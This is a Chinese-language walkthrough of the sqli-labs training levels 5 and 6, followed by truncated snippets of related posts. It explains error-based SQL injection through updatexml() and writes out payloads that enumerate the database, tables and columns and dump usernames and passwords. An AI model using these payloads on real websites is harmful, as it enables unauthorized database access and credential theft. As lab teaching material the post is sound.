less-5
通過盲注(and 1=1 ,and 1=2)來構造sql語句,最終發現構造語句如下
這裡我們發現並沒有返回值,通過構造sql語句爆庫也沒有任何返回值
所以我們猜測這裡可能用報錯注入
在進行爆庫之前我們要先了解報錯注入要用到的函式
updatexml(xml_document,xpath_string,new_value)
第乙個引數:xml_document是string格式,為xml文件物件的名稱,中文為doc
第二個引數:xpath_string(xpath格式的字串)
第三個引數:new_value,string格式,替換查詢到符合條件的資料
在這裡如果所用到的引數不符合以上的要求,則此函式會以報錯的形式將結果返回
例如updatexml(1,concat(),1)
其中concat()函式的作用是將其內容連線成乙個字串,所以不符合xpath_string的要求,因此,concat()中的內容會以報錯的形式返回
接下來我們構造語句查庫
?id=1』and updatexml(1,concat(0x7e,database(),0x7e),1)–+
0x7e是~的ascii的十六進製制編碼
查表?id=1%27and%20updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=『security』 limit 0,1),0x7e),1)–+
我們通過調整limit 0,1來獲得所有的table_name
查列?id=1』and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name= 'users』and table_schema='security』limit 0,1),0x7e),1)–+
爆庫?id=1』and updatexml(1,concat(0x7e,(select concat_ws(』:』,id,username,password) from users limit 0,1),0x7e),1)–+
爆庫完成
less-6
第六關和第五關的方法一樣都是報錯注入只不過構造的語句變為
?id=1" --+
五六關還有其他解法,比如雙注入啦,還有另外一種報錯注入啦
我搞了好久都沒搞明白,我弄出來的結果不知道為什麼和別人弄出來的總是差了點,等我以後弄出來了,再教大家哈
sqli labs master 第十一關
本關為post請求 輸入 admin 密碼 隨意 爆出當前資料庫 使用者名稱 payload1 admin and extractvalue 1,concat 0x7e,database 0x7e payload2 admin and extractvalue 1,concat 0x7e,selec...
sqli labs master 闖關前知識點學習
1 前期準備 知識點 開始之前,為了方便檢視sql注入語句,我在sqli labs master網頁原始碼php部分加了兩行 第一行意思是輸出資料庫語句,第二行是換行符 一 mysql 登入 1 明文密碼 在bin目錄下 輸入 mysql u 賬戶 p 密碼 2 密碼 在bin目錄下 輸入 mysq...
sqli labs master 第二,三,四關
第二關 判斷注入型別 原因 sql select from users where id id limit 0,1 未對id做任何處理無須閉合 判斷列數 order by 3 判斷顯示位 爆出資料庫 union select 1 group concat schema name 3 from inf...